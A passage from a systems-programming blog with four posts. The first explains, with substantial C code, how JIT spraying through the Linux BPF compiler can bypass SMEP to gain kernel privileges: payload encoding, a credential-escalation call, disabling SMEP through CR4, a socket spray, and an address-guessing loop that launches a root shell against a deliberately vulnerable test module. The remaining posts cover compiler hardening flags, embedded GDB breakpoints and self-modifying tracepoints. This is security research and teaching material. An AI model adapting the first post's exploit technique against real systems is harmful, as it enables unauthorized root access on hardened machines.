Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.
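
For concreteness, here is a sketch (mine, not from the exploit above) of what that control-register poke looks like. SMEP is enabled by bit 20 of CR4, so kernel-mode code can clear it like this:

// Hypothetical kernel-mode sketch: clear CR4.SMEP (bit 20).
// A real payload would have to encode this in the three-byte
// instruction chunks described earlier.
static void disable_smep(void) {
    unsigned long cr4;
    asm volatile ("mov %%cr4, %0" : "=r" (cr4));
    cr4 &= ~(1UL << 20);                    // clear the SMEP bit
    asm volatile ("mov %0, %%cr4" : : "r" (cr4));
}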

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors.[1] An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth[2] of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}
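
(The filt argument here is the struct sock_fprog wrapper around the code array built earlier. Its definition is elided in this post; presumably it looks something like this:)

// Hypothetical definition of filt, filled in once the program is built.
struct sock_fprog filt;

void finish_bpf(void) {
    filt.len    = code_len;
    filt.filter = code;
}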

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.
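
For reference, here is roughly what such a function might look like, using the standard SCM_RIGHTS ancillary-data dance. This is a sketch assuming <sys/socket.h> and <string.h>; the real send_fd in the repository also handles errors.

// Minimal sketch of sending one fd over a UNIX domain socket.
void send_fd(int dest, int fd_to_send) {
    char dummy = 'x';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };

    union {
        struct cmsghdr hdr;
        char buf[CMSG_SPACE(sizeof(int))];
    } control;

    struct msghdr msg = {
        .msg_iov        = &iov,
        .msg_iovlen     = 1,
        .msg_control    = control.buf,
        .msg_controllen = sizeof(control.buf),
    };

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type  = SCM_RIGHTS;
    cmsg->cmsg_len   = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    sendmsg(dest, &msg, 0);
}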

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy of the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

  • SMEP is not widely deployed yet.
  • The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements[3] in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...


  1. Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.

  2. While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.

  3. On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.

Sunday, May 13, 2012

Automatic binary hardening with Autoconf

How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.

Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to Mosh, I made it a goal to build with full hardening on every platform, not just proactive distributions like Ubuntu. This means detecting available hardening features at compile time.

Mosh uses Autotools, so this code is naturally part of the Autoconf script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.

I've published an example project which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I waive all copyright and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the m4/ subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.

This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.

How it works

The basic idea is simple. We use AX_CHECK_{COMPILE,LINK}_FLAG from the Autoconf Archive to detect support for each feature. The syntax is

AX_CHECK_COMPILE_FLAG(flag, action-if-supported, action-if-unsupported, extra-flags)

For extra-flags we generally pass -Werror so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the action-if-supported and action-if-unsupported blocks. You can see the full story in configure.ac.

We accumulate all the supported flags into HARDEN_{C,LD}FLAGS and substitute these into each Makefile.am. The hardening flags take effect even if the user overrides CFLAGS on the command line. To explicitly disable hardening, pass

./configure --disable-hardening

A useful command when testing is

grep HARDEN config.log

Complications

Clang will not error out on unrecognized flags, even with -Werror. Instead it prints a message like

clang: warning: argument unused during compilation: '-foo'

and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script wrap-compiler-for-flag-check runs a command and errors out if the command prints a line containing "warning: argument unused". Then configure temporarily sets

CC="$srcdir/scripts/wrap-compiler-for-flag-check $CC"

while performing the flag checks.

When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags conflict with ours. For example we set -Wstack-protector, meaning "warn about any unprotected functions", and they set --param=ssp-buffer-size=4, meaning "don't protect functions with fewer than 4 bytes of buffers". Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to debian/rules:

export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector
-include /usr/share/dpkg/buildflags.mk

We did something similar for Fedora.

Yet another problem is that Debian distributes skalibs (a Mosh dependency) as a static-only library, built without -fPIC, which in turn prevents Mosh from using -fPIC. Mosh can build the relevant parts of skalibs internally, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to reimplement the small amount of skalibs we were using on Linux.

The flags

Here are the specific protections I enabled.

  • -D_FORTIFY_SOURCE=2 enables some compile-time and run-time checks on memory and string manipulation. This requires -O1 or higher. See also man 7 feature_test_macros.

  • -fno-strict-overflow prevents GCC from optimizing away arithmetic overflow tests. (See the example after this list.)

  • -fstack-protector-all detects stack buffer overflows after they occur, using a stack canary. We also set -Wstack-protector (warn about unprotected functions) and --param ssp-buffer-size=1 (protect regardless of buffer size). (Actually, the "-all" part of -fstack-protector-all might imply ssp-buffer-size=1.)

  • Attackers can use fragments of legitimate code already in memory to stitch together exploits. This is much harder if they don't know where any of that code is located. Shared libraries get random addresses by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a position independent executable (PIE), with the goal that every executable page has a randomized address.

  • Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the dynamic loader needs to perform relocations there. The GNU linker flag -z relro arranges to set them as read-only once the dynamic loader is done with them.

    In particular, this can protect the PLT and GOT, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set -z now to resolve PLT entries at startup so they get RELRO protection.
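
To illustrate the -fno-strict-overflow item: signed overflow is undefined behavior in C, so under strict-overflow assumptions the compiler may decide an after-the-fact check can never fire and delete it. A hypothetical example:

// GCC may treat "x + 1 < x" as always false for signed x and
// remove this check entirely; -fno-strict-overflow keeps it.
int add_would_overflow(int x) {
    return x + 1 < x;
}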

In the example project I also enabled -Wall -Wextra -Werror. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project -Wall-clean, you can at least add security-relevant checks such as -Wformat-security.

Demonstration

On x86 Linux, we can check the hardening features using Tobias Klein's checksec.sh. First, as a control, let's build with no hardening.

$ ./build.sh --disable-hardening
+ autoreconf -fi
+ ./configure --disable-hardening
...
+ make
...
$ ~/checksec.sh --file src/test
No RELRO       No canary found  NX enabled  No PIE

The no-execute bit (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:

$ ./build.sh
+ autoreconf -fi
+ ./configure
...
checking whether C compiler accepts -fno-strict-overflow... yes
checking whether C++ compiler accepts -fno-strict-overflow... yes
checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C compiler accepts -fstack-protector-all... yes
checking whether C++ compiler accepts -fstack-protector-all... yes
checking whether the linker accepts -fstack-protector-all... yes
checking whether C compiler accepts -Wstack-protector... yes
checking whether C++ compiler accepts -Wstack-protector... yes
checking whether C compiler accepts --param ssp-buffer-size=1... yes
checking whether C++ compiler accepts --param ssp-buffer-size=1... yes
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... yes
checking whether the linker accepts -Wl,-z,relro... yes
checking whether the linker accepts -Wl,-z,now... yes
...
+ make
...
$ ~/checksec.sh --file src/test
Full RELRO     Canary found     NX enabled  PIE enabled

We can dig deeper on some of these. objdump -d shows that the unhardened executable puts main at a fixed address, say 0x4006e0, while the position-independent executable specifies a small offset like 0x9e0. We can also see the stack-canary checks:

b80:  sub   $0x18,%rsp
b84:  mov   %fs:0x28,%rax
b8d:  mov   %rax,0x8(%rsp)

      ... function body ...

b94:  mov   0x8(%rsp),%rax
b99:  xor   %fs:0x28,%rax
ba2:  jne   bb4 <c_fun+0x34>

      ... normal epilogue ...

bb4:  callq 9c0 <__stack_chk_fail@plt>

The function starts by copying a "canary" value from %fs:0x28 to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.

The canary is chosen randomly by glibc at program start. The %fs segment has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).

The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:

$ ./build.sh LDFLAGS=-static
+ autoreconf -fi
+ ./configure LDFLAGS=-static
...
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... no
...
+ make
...
$ file src/test
src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, for GNU/Linux 2.6.26, not stripped
$ ~/checksec.sh --file src/test
Partial RELRO  Canary found     NX enabled  No PIE

We can't have position independence with static linking. And checksec.sh thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.

Performance

So what's the catch? These protections can slow down your program significantly. I ran a few benchmarks for Mosh, on three test machines:

  • A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 i386

  • A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid amd64

  • A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid amd64

In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.

Protections                   Netbook   Laptop   Desktop
Everything                       16.0      4.4       2.1
All except PIE                    4.7      3.3       2.2
All except stack protector       11.0      1.0       1.1

PIE really hurts on i386 because data references use an extra register, and registers are scarce to begin with. It's much cheaper on amd64 thanks to PC-relative addressing.

There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.

Thursday, January 19, 2012

Embedding GDB breakpoints in C source code

Have you ever wanted to embed GDB breakpoints in C source code?

int main() {
    printf("Hello,\n");
    EMBED_BREAKPOINT;
    printf("world!\n");
    EMBED_BREAKPOINT;
    return 0;
}

One way is to directly insert your CPU's breakpoint instruction. On x86:

#define EMBED_BREAKPOINT  asm volatile ("int3;")

There are at least two problems with this approach:

  • They aren't real GDB breakpoints. You can't disable them, count how many times they've been hit, etc.

  • If you run the program outside GDB, the breakpoint instruction will crash your process.

Here is a small hack which solves both problems:

#define EMBED_BREAKPOINT \
    asm("0:"                              \
        ".pushsection embed-breakpoints;" \
        ".quad 0b;"                       \
        ".popsection;")

We place a local label into the instruction stream, and then save its address in the embed-breakpoints linker section.

Then we need to convert these addresses into GDB breakpoint commands. I wrote a tool that does this, as a wrapper for the gdb command. Here's how it works, on our initial example:

$ gcc -g -o example example.c

$ ./gdb-with-breakpoints ./example
Reading symbols from example...done.
Breakpoint 1 at 0x4004f2: file example.c, line 8.
Breakpoint 2 at 0x4004fc: file example.c, line 10.
(gdb) run
Starting program: example 
Hello,

Breakpoint 1, main () at example.c:8
8           printf("world!\n");
(gdb) info breakpoints
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0x00000000004004f2 in main at example.c:8
        breakpoint already hit 1 time
2       breakpoint     keep y   0x00000000004004fc in main at example.c:10

If we run the program normally, or in GDB without the wrapper, the EMBED_BREAKPOINT statements do nothing. The breakpoint addresses aren't even loaded into memory, because the embed-breakpoints section is not marked as allocatable.

You can find all of the code on GitHub under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.

I'm not sure about the decision to write the GDB wrapper in C using BFD. I also considered Haskell and elf, or Python and the new pyelftools. One can probably do something nicer using the GDB Python API, which was added a few years ago.

This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux proc filesystem, so that it can pass to GDB a temporary file which has already been unlinked. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.

Monday, November 7, 2011

Self-modifying code for debug tracing in quasi-C

Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. It would be convenient to declare "tracepoints" and enable them at runtime, like so:

tracepoint foo_entry;

int foo(int n) {
    TRACE(foo_entry, "called foo(%d)\n", n);
    // ...
}

// Called from UI, monitoring interface, etc.
void debug_foo() {
    enable(&foo_entry);
}

Here's a simple implementation of this API:

typedef int tracepoint;

#define TRACE(_point, _args...) \
    do { \
        if (_point) printf(_args); \
    } while (0)

static inline void enable(tracepoint *point) {
    *point = 1;
}

Each tracepoint is simply a global variable. The construct do { ... } while (0) is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for macros with a variable number of arguments.
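
To see why the do/while wrapper matters, consider a macro that expanded to a bare block instead. In an if/else (a hypothetical caller; verbose and quiet_path are made up), the semicolon after the macro call would end the if statement and make the else a syntax error. The wrapper makes the expansion behave like a single statement:

if (verbose)
    TRACE(foo_entry, "called foo(%d)\n", n);  // expands to do { ... } while (0)
else
    quiet_path();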

This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.

Our new solution will be specific to x86-64 processors running Linux, though the idea can be ported to other platforms. This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as ftrace, kprobes, immediate values, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.

The design

Our new TRACE macro will produce code like the following pseudo-assembly:

foo:
...
; code before tracepoint
...
tracepoint:
nop
after_tracepoint:
...
; rest of function
...
ret

do_tracepoint:
push args to printf
call printf
jmp after_tracepoint

In the common case, the tracepoint is disabled, and the overhead is only a single nop instruction. To enable the tracepoint, we replace the nop instruction in memory with jmp do_tracepoint.

The TRACE macro

Our nop instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard jmp instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte nop. Five one-byte 0x90 instructions would work, but a single five-byte instruction will consume fewer CPU resources. Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of favorite nops. We'll use this one:

#define NOP5 ".byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"

Let's check this instruction using udcli:

$ echo 0f 1f 44 00 00 | udcli -x -64 -att
0000000000000000 0f1f440000       nop 0x0(%rax,%rax)

GCC's extended inline assembly lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the asm goto flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the asm goto feature, and my macro is adapted from an example in the GCC manual.)

Here's how it looks:

typedef int tracepoint;

#define TRACE(_point, _args...) \
    do { \
        asm goto ( \
            "0: " NOP5 \
            ".pushsection trace_table, \"a\";" \
            ".quad " #_point ", 0b, %l0;" \
            ".popsection" \
            : : : : __lbl_##_point); \
        if (0) { \
            __lbl_##_point: printf(_args); \
        } \
    } while (0)

We use the stringify and concat macro operators, and rely on the gluing together of adjacent string literals. A call like this:

TRACE(foo_entry, "called foo(%d)\n", n);

will produce the following code:

do {
    asm goto (
        "0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"
        ".pushsection trace_table, \"a\";"
        ".quad foo_entry, 0b, %l0;"
        ".popsection"
        : : : : __lbl_foo_entry);
    if (0) {
        __lbl_foo_entry: printf("called foo(%d)\n", n);
    }
} while (0);

Besides emitting the nop instruction, we write three 64-bit values ("quads"). They are, in order:

  • The address of the tracepoint variable declared by the user. We never actually read or write this variable. We're just using its address as a unique key.
  • The address of the nop instruction, by way of a local assembler label.
  • The address of the C label for our printf call, as passed to asm goto.

This is the information we need in order to patch in a jmp at runtime. The .pushsection directive makes the assembler write into the trace_table section without disrupting the normal flow of code and data. The "a" section flag marks these bytes as "allocatable", i.e. something we actually want available at runtime.

We count on GCC's optimizer to notice that the condition 0 is unlikely to be true, and therefore move the if body to the end of the function. It's still considered reachable due to the label passed to asm goto, so it will not fall victim to dead code elimination.

The linker script

We have to collect all of these trace_table records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following linker script:

SECTIONS {
  trace_table : {
    trace_table_start = .;
    *(trace_table)
    trace_table_end = .;
  }
}

This concatenates all trace_table sections into a single section in the resulting binary. It also provides symbols trace_table_start and trace_table_end at the endpoints of this section.

Memory protection

Linux systems will prevent an application from overwriting its own code, for good security reasons, but we can explicitly override these permissions. Memory permissions are managed per page of memory. There's a correct way to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.

#define PAGE_SIZE 4096
#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) & ~(PAGE_SIZE-1) )

Then we can unprotect an arbitrary region of memory by calling mprotect for the appropriate page(s):

static void unprotect(void *addr, size_t len) {
    uint64_t pg1 = PAGE_OF(addr),
             pg2 = PAGE_OF(addr + len - 1);
    if (mprotect((void *) pg1, pg2 - pg1 + PAGE_SIZE,
                 PROT_READ | PROT_EXEC | PROT_WRITE)) {
        perror("mprotect");
        abort();
    }
}

We're calling mprotect on a page which was not obtained from mmap. POSIX does not define this behavior, but Linux specifically allows mprotect on any page except the vsyscall page.

Enabling a tracepoint

Now we need to implement the enable function:

void enable(tracepoint *point);

We will scan through the trace_table records looking for a matching tracepoint pointer. The C struct corresponding to a trace_table record is:

struct trace_desc {
    tracepoint *point;
    void *jump_from;
    void *jump_to;
} __attribute__((packed));

The packed attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. Now we can implement a linear search through this table.

void enable(tracepoint *point) {
    extern struct trace_desc trace_table_start[], trace_table_end[];
    struct trace_desc *desc;
    for (desc = trace_table_start; desc < trace_table_end; desc++) {
        if (desc->point != point)
            continue;

        int64_t offset = (desc->jump_to - desc->jump_from) - 5;
        if ((offset > INT32_MAX) || (offset < INT32_MIN)) {
            fprintf(stderr, "offset too big: %lx\n", offset);
            abort();
        }

        int32_t offset32 = offset;
        unsigned char *dest = desc->jump_from;
        unprotect(dest, 5);
        dest[0] = 0xe9;
        memcpy(dest+1, &offset32, 4);
    }
}

We enable a tracepoint by overwriting its nop with an unconditional jump. The opcode is 0xe9. The operand is a 32-bit displacement, interpreted relative to the instruction after the jump. desc->jump_from points to the beginning of what will be the jump instruction, so we subtract 5 from the displacement. Then we unprotect memory and write the new bytes into place.

That's everything. You can grab all of this code from GitHub, including a simple test program.

Pitfalls

Where to start?

This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an instruction cache flush after writing to code. Linux on ARM implements the cacheflush system call for this purpose.

Our code is not thread-safe, either. If one thread reaches a nop while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The Ksplice paper [PDF] discusses how to prevent this, in the context of live-patching the Linux kernel.

Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.

